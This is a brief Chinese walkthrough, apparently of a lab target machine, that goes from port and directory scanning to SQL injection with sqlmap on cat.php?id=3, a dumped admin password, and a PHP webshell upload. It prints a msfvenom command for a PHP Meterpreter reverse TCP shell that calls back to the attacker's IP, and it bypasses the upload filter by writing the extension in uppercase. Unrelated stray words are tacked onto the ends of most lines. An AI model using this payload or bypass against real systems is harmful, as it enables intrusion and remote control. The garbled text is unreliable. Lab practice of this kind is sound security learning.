攻擊機:192.168.32.152php
靶機 :192.168.32.157web
掃描靶機掃端口:sql
開放了ssh和80
看下ssh版本有沒有漏洞,searchsplot下,沒有發現shell
dirb掃描下目錄,有個admin的打開ssh
進入到一個登陸界面,隨時試了幾個弱口令,不行tcp
用掃描器吧,打開owasp zap掃一下blog
直接掃到了一個注入點 http://192.168.32.157/cat.php?id=3 ,直接sqlmap跑一下登錄
存在注入,那麼直接,爆庫,爆字段,爆關鍵字,發現了password:map
登進來了
找到一個上傳點im
再製做一個webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 -f raw
上傳時發現文件名不能包含php,那就改爲PHP便可
上傳成功後,再用msf監聽端口,拿到shell